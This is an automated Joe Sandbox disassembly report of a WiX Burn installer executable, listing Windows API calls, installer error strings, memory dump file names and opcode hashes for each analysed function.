                                                                                                                • Instruction Fuzzy Hash: 25514772D00259BBDF12DFA5CC45EAEBBBDEB48B50F014165FA14E6190EB318E11DBA0
                                                                                                                APIs
                                                                                                                • _MREFOpen@16.MSPDB140-MSVCRT ref: 009A9EED
                                                                                                                • _MREFOpen@16.MSPDB140-MSVCRT ref: 009A9F12
                                                                                                                Strings
                                                                                                                • Failed to format product code string., xrefs: 009A9F1D
                                                                                                                • MsiComponentSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 009AA006
                                                                                                                • Failed to set variable., xrefs: 009A9FF6
                                                                                                                • Failed to get component path: %d, xrefs: 009A9F76
                                                                                                                • Failed to format component id string., xrefs: 009A9EF8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Open@16
                                                                                                                • String ID: Failed to format component id string.$Failed to format product code string.$Failed to get component path: %d$Failed to set variable.$MsiComponentSearch failed: ID '%ls', HRESULT 0x%x
                                                                                                                • API String ID: 3613110473-1671347822
                                                                                                                • Opcode ID: e69bacd35687ae334e50f0042481aad216d265bb38b2596494a0b7756f2c2e69
                                                                                                                • Instruction ID: b4df262d523f577c4373ee710191ca73e204a0ee511c9d982351917cc2922c18
                                                                                                                • Opcode Fuzzy Hash: e69bacd35687ae334e50f0042481aad216d265bb38b2596494a0b7756f2c2e69
                                                                                                                • Instruction Fuzzy Hash: 5F41E232900115BECF26AAA98C46FBEB76CFF87310F244616F515E2191E7319E50D7D2
                                                                                                                APIs
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 009AF942
                                                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 009AF94F
                                                                                                                Strings
                                                                                                                • %ls.RebootRequired, xrefs: 009AF82F
                                                                                                                • Failed to open registration key., xrefs: 009AF8AB
                                                                                                                • Resume, xrefs: 009AF8B6
                                                                                                                • Failed to format pending restart registry key to read., xrefs: 009AF846
                                                                                                                • Failed to read Resume value., xrefs: 009AF8D8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
                                                                                                                • API String ID: 3535843008-3890505273
                                                                                                                • Opcode ID: 084f4de9b868e0fb09eb8c34b183847de2ed00172982504b60e5a06a7c51d10f
                                                                                                                • Instruction ID: 06785d16bb569554baa6f09ce4278fae4fb93412b324266ada71e3cc1686d932
                                                                                                                • Opcode Fuzzy Hash: 084f4de9b868e0fb09eb8c34b183847de2ed00172982504b60e5a06a7c51d10f
                                                                                                                • Instruction Fuzzy Hash: DF414D71900159FFCB229FD8C891BAEBBB8EB86310F16417AE915AB210C3759E419BC0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource
                                                                                                                • API String ID: 0-660234312
                                                                                                                • Opcode ID: 146d6170e83ba89325b2f99f1e1585051b720c7482133017d71a2b09c9d991dc
                                                                                                                • Instruction ID: e5c02f2c0a0d837bd0fcd9243a20ba2bf152b6b0f33e98e850af33553547643e
                                                                                                                • Opcode Fuzzy Hash: 146d6170e83ba89325b2f99f1e1585051b720c7482133017d71a2b09c9d991dc
                                                                                                                • Instruction Fuzzy Hash: 7331B83290426DBBCF229A94CD45FEEBBBADB41730F214251F920F6191DB719D40D7A1
                                                                                                                APIs
                                                                                                                • CoCreateInstance.OLE32(00A00C4C,00000000,00000017,00A00C5C,?,?,00000000,00000000,?,?,?,?,?,009CDEE7,00000000,00000000), ref: 009CD8E8
                                                                                                                Strings
                                                                                                                • Failed to set progress timeout., xrefs: 009CD952
                                                                                                                • WixBurn, xrefs: 009CD913
                                                                                                                • Failed to set notification flags for BITS job., xrefs: 009CD93A
                                                                                                                • Failed to set BITS job to foreground., xrefs: 009CD969
                                                                                                                • Failed to create IBackgroundCopyManager., xrefs: 009CD8F4
                                                                                                                • Failed to create BITS job., xrefs: 009CD922
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateInstance
                                                                                                                • String ID: Failed to create BITS job.$Failed to create IBackgroundCopyManager.$Failed to set BITS job to foreground.$Failed to set notification flags for BITS job.$Failed to set progress timeout.$WixBurn
                                                                                                                • API String ID: 542301482-468763447
                                                                                                                • Opcode ID: 6868a0bc7a8a10d02e2a4395b17db8a135c59c29fc3e26b9f0f8f02099eaf430
                                                                                                                • Instruction ID: af2e942ba3616ee7f84a25f4d7a0e8ee4af1fc4734f53b651c083fd26adb31ea
                                                                                                                • Opcode Fuzzy Hash: 6868a0bc7a8a10d02e2a4395b17db8a135c59c29fc3e26b9f0f8f02099eaf430
                                                                                                                • Instruction Fuzzy Hash: 40318435F42319AFDB15DBA9D855F6FBBB4AF48710B00056DEA05EB390DA309C058B92
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,?,?,?,?,WiX\Burn,DownloadTimeout,00000078), ref: 009E5DF8
                                                                                                                • GetLastError.KERNEL32 ref: 009E5E05
                                                                                                                • ReadFile.KERNEL32(00000000,00000008,00000008,?,00000000), ref: 009E5E4C
                                                                                                                • GetLastError.KERNEL32 ref: 009E5E80
                                                                                                                • CloseHandle.KERNEL32(00000000,dlutil.cpp,000000C8,00000000), ref: 009E5EB4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLast$CloseCreateHandleRead
                                                                                                                • String ID: %ls.R$dlutil.cpp
                                                                                                                • API String ID: 3160720760-657863730
                                                                                                                • Opcode ID: 77732c2bd769c4afd73be104723e19fb95cde8ed059a2e5b6170337f4155d861
                                                                                                                • Instruction ID: b1e754908749690ddf338957b63ae1bc49d78b95023556c3f77dcca184e38dc5
                                                                                                                • Opcode Fuzzy Hash: 77732c2bd769c4afd73be104723e19fb95cde8ed059a2e5b6170337f4155d861
                                                                                                                • Instruction Fuzzy Hash: E631F372A01664BBDB318B968C85B6E7AA8AB41735F124259FE11EB2C0D7709E0086E0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009ACD5E: CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,009AE444,000000FF,00000000,00000000,009AE444,?,?,009ADBEB,?,?,?,?), ref: 009ACD89
                                                                                                                • CreateFileW.KERNEL32(E9009EBA,80000000,00000005,00000000,00000003,08000000,00000000,009A53C5,?,00000000,840F01E8,14680A79,00000001,009A53BD,00000000,009A5489), ref: 009AC956
                                                                                                                • GetLastError.KERNEL32(?,?,?,009B7809,009A566D,009A5479,009A5479,00000000,?,009A5489,FFF9E89D,009A5489,009A54BD,009A5445,?,009A5445), ref: 009AC99B
                                                                                                                Strings
                                                                                                                • Failed to verify catalog signature: %ls, xrefs: 009AC994
                                                                                                                • Failed to open catalog in working path: %ls, xrefs: 009AC9C9
                                                                                                                • Failed to get catalog local file path, xrefs: 009AC9D9
                                                                                                                • catalog.cpp, xrefs: 009AC9BC
                                                                                                                • Failed to find payload for catalog file., xrefs: 009AC9E0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CompareCreateErrorFileLastString
                                                                                                                • String ID: Failed to find payload for catalog file.$Failed to get catalog local file path$Failed to open catalog in working path: %ls$Failed to verify catalog signature: %ls$catalog.cpp
                                                                                                                • API String ID: 1774366664-48089280
                                                                                                                • Opcode ID: 2392ca334ba362f5f5001993efa84c17f0b482ce86689bb0acbcc055d5b7aef3
                                                                                                                • Instruction ID: 7d7e6c4d8b0470aae7755919a832a0f1db3051a97182e8130b2d1f92e83d053d
                                                                                                                • Opcode Fuzzy Hash: 2392ca334ba362f5f5001993efa84c17f0b482ce86689bb0acbcc055d5b7aef3
                                                                                                                • Instruction Fuzzy Hash: 8A312872900625BFCB219B55CC46F5EBBA4EF45720F218526F914EF250E770AD009BD0
                                                                                                                APIs
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,74DF30B0,00000000,?,?,?,?,009CD642,?), ref: 009CD357
                                                                                                                • ReleaseMutex.KERNEL32(?,?,?,?,009CD642,?), ref: 009CD375
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 009CD3B6
                                                                                                                • ReleaseMutex.KERNEL32(?), ref: 009CD3CD
                                                                                                                • SetEvent.KERNEL32(?), ref: 009CD3D6
                                                                                                                Strings
                                                                                                                • Failed to send files in use message from netfx chainer., xrefs: 009CD41C
                                                                                                                • Failed to get message from netfx chainer., xrefs: 009CD3F7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MutexObjectReleaseSingleWait$Event
                                                                                                                • String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.
                                                                                                                • API String ID: 2608678126-3424578679
                                                                                                                • Opcode ID: 064a3b628d5cd5cbb5cac17bd8b427b3e6497cdf6c62977595cc42a4dbc578ba
                                                                                                                • Instruction ID: 4e6f2f1b0b1fb1ffed780a09422d99be0386390958fa98e598e8819b5793b4f2
                                                                                                                • Opcode Fuzzy Hash: 064a3b628d5cd5cbb5cac17bd8b427b3e6497cdf6c62977595cc42a4dbc578ba
                                                                                                                • Instruction Fuzzy Hash: 43310931D04649BFCB119F94DC48FAFBBF9EF49320F108669F624A62A1C7709900DB91
                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 009E09AB
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 009E09B5
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00000000,00000000), ref: 009E09FE
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 009E0A0B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$CreateErrorLastProcess
                                                                                                                • String ID: "%ls" %ls$D$procutil.cpp
                                                                                                                • API String ID: 161867955-2732225242
                                                                                                                • Opcode ID: 0c4aac9119357781b59eb74af2e0e7a689ab1c10853814fe137e876117a06e56
                                                                                                                • Instruction ID: f66792608b2457574ad86574d4adea8faeecce2012d68db1d548b3251010f2ea
                                                                                                                • Opcode Fuzzy Hash: 0c4aac9119357781b59eb74af2e0e7a689ab1c10853814fe137e876117a06e56
                                                                                                                • Instruction Fuzzy Hash: 86216F72D0029EABDB12DFD6CD41AAFBBB8FF40750F100425EA00B7212D3B09E409AA1
                                                                                                                APIs
                                                                                                                • _MREFOpen@16.MSPDB140-MSVCRT ref: 009A9BB3
                                                                                                                • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,?,009AA8AB,00000100,000002C0,000002C0,00000100), ref: 009A9BD3
                                                                                                                • GetLastError.KERNEL32(?,009AA8AB,00000100,000002C0,000002C0,00000100), ref: 009A9BDE
                                                                                                                Strings
                                                                                                                • Failed to format variable string., xrefs: 009A9BBE
                                                                                                                • Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 009A9C4A
                                                                                                                • Failed to set directory search path variable., xrefs: 009A9C0F
                                                                                                                • Failed while searching directory search: %ls, for path: %ls, xrefs: 009A9C34
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesErrorFileLastOpen@16
                                                                                                                • String ID: Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls
                                                                                                                • API String ID: 1811509786-2966038646
                                                                                                                • Opcode ID: acf190586892b688044f624095be6136420e779440af052ab81a8f0cc9f72b3d
                                                                                                                • Instruction ID: 4845e173f3f890e08adccfd44415faa1e618919f17922711c1e20d99a1002362
                                                                                                                • Opcode Fuzzy Hash: acf190586892b688044f624095be6136420e779440af052ab81a8f0cc9f72b3d
                                                                                                                • Instruction Fuzzy Hash: 0C213833940465F7CF2326998D02B5EBBB8BF42730F200201FD187B1A2C7769E50A6D9
                                                                                                                APIs
                                                                                                                • _MREFOpen@16.MSPDB140-MSVCRT ref: 009A9D64
                                                                                                                • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,?,009AA883,00000100,000002C0,000002C0,?,000002C0,00000100), ref: 009A9D84
                                                                                                                • GetLastError.KERNEL32(?,009AA883,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 009A9D8F
                                                                                                                Strings
                                                                                                                • Failed to format variable string., xrefs: 009A9D6F
                                                                                                                • Failed to set variable to file search path., xrefs: 009A9DE7
                                                                                                                • Failed while searching file search: %ls, for path: %ls, xrefs: 009A9DBD
                                                                                                                • File search: %ls, did not find path: %ls, xrefs: 009A9DF3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesErrorFileLastOpen@16
                                                                                                                • String ID: Failed to format variable string.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls
                                                                                                                • API String ID: 1811509786-3425311760
                                                                                                                • Opcode ID: 686a19307a9cf6b6c6418ce51607180c031ee70bda856e957583af0eda852d7d
                                                                                                                • Instruction ID: e67323c246e1b87027f283c68d8654c0e99e9e60b39b3a54f4f0f1a00a9980f2
                                                                                                                • Opcode Fuzzy Hash: 686a19307a9cf6b6c6418ce51607180c031ee70bda856e957583af0eda852d7d
                                                                                                                • Instruction Fuzzy Hash: 18112433940165B7DF236799CD02B9EBA69BF42734F210201FD10B61A1E7325EA0A6D1
                                                                                                                APIs
                                                                                                                • WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,009BD365,00000000,?,?,009BC7C9,00000001,?,?,?,?,?), ref: 009BCF37
                                                                                                                • GetLastError.KERNEL32(?,?,009BD365,00000000,?,?,009BC7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 009BCF41
                                                                                                                • GetExitCodeThread.KERNEL32(00000001,?,?,?,009BD365,00000000,?,?,009BC7C9,00000001,?,?,?,?,?,00000000), ref: 009BCF7D
                                                                                                                • GetLastError.KERNEL32(?,?,009BD365,00000000,?,?,009BC7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 009BCF87
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                                                                                • String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$elevation.cpp
                                                                                                                • API String ID: 3686190907-1954264426
                                                                                                                • Opcode ID: 350197610acf56d1362e62a3ba9470a694f242bdb04fe5c7af854ecb9cd0fd9d
                                                                                                                • Instruction ID: 9b339f87580f240be273391d2f8928c75583622382fc16438ee7d2fd0a843c27
                                                                                                                • Opcode Fuzzy Hash: 350197610acf56d1362e62a3ba9470a694f242bdb04fe5c7af854ecb9cd0fd9d
                                                                                                                • Instruction Fuzzy Hash: 8B016DB3E4563973873057CA4D0AABFBA59AF05B72B0101A5BF14FF180E754DC0092E4
                                                                                                                APIs
                                                                                                                • WaitForSingleObject.KERNEL32(00000001,000000FF,00000000,?,009B6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 009B69BB
                                                                                                                • GetLastError.KERNEL32(?,009B6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 009B69C5
                                                                                                                • GetExitCodeThread.KERNEL32(00000001,00000000,?,009B6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 009B6A04
                                                                                                                • GetLastError.KERNEL32(?,009B6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 009B6A0E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                                                                                • String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$core.cpp
                                                                                                                • API String ID: 3686190907-2546940223
                                                                                                                • Opcode ID: 9715285be727a49d5195e856c33c112bd82cdb51330bca94a59bf9c6de63deeb
                                                                                                                • Instruction ID: f52b83dc8c11451dcf04cf173550a9ea46fccd4b0178df3e5895726ab2cf6bb3
                                                                                                                • Opcode Fuzzy Hash: 9715285be727a49d5195e856c33c112bd82cdb51330bca94a59bf9c6de63deeb
                                                                                                                • Instruction Fuzzy Hash: 4D11697174424AFBDB109FA5DE02BBF76ACEF40721F204169BA14E9160DB39DE40A754
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 009BF7EE
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 009BF8FB
                                                                                                                Strings
                                                                                                                • Failed to set source path for payload., xrefs: 009BF88A
                                                                                                                • Engine is active, cannot change engine state., xrefs: 009BF808
                                                                                                                • UX requested unknown payload with id: %ls, xrefs: 009BF85A
                                                                                                                • UX requested unknown container with id: %ls, xrefs: 009BF8BA
                                                                                                                • Failed to set source path for container., xrefs: 009BF8E0
                                                                                                                • UX denied while trying to set source on embedded payload: %ls, xrefs: 009BF870
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                                • String ID: Engine is active, cannot change engine state.$Failed to set source path for container.$Failed to set source path for payload.$UX denied while trying to set source on embedded payload: %ls$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                                                                                • API String ID: 3168844106-4121889706
                                                                                                                • Opcode ID: e990ef293fa5d71c3042db20b370322c2eedffb4def28fd5c7d48771ee0bd791
                                                                                                                • Instruction ID: 4c77ac0b232fed129ccafbdabe9344eeec01827b9d7e3f77c6163b5058299f2e
                                                                                                                • Opcode Fuzzy Hash: e990ef293fa5d71c3042db20b370322c2eedffb4def28fd5c7d48771ee0bd791
                                                                                                                • Instruction Fuzzy Hash: 00314872A04255AF8B219B58CD55EEBB3ACEF847307158076F806EB341DB79ED008790
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(00000000), ref: 009A7210
                                                                                                                Strings
                                                                                                                • Failed to format escape sequence., xrefs: 009A72AA
                                                                                                                • [\%c], xrefs: 009A726F
                                                                                                                • Failed to copy string., xrefs: 009A72C4
                                                                                                                • []{}, xrefs: 009A723A
                                                                                                                • Failed to append escape sequence., xrefs: 009A72A3
                                                                                                                • Failed to allocate buffer for escaped string., xrefs: 009A7227
                                                                                                                • Failed to append characters., xrefs: 009A729C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen
                                                                                                                • String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}
                                                                                                                • API String ID: 1659193697-3250950999
                                                                                                                • Opcode ID: 0f9ecf751db0ca1fd417de3d3354b031ef22d0f9f940e7d5f12ae20eaa995693
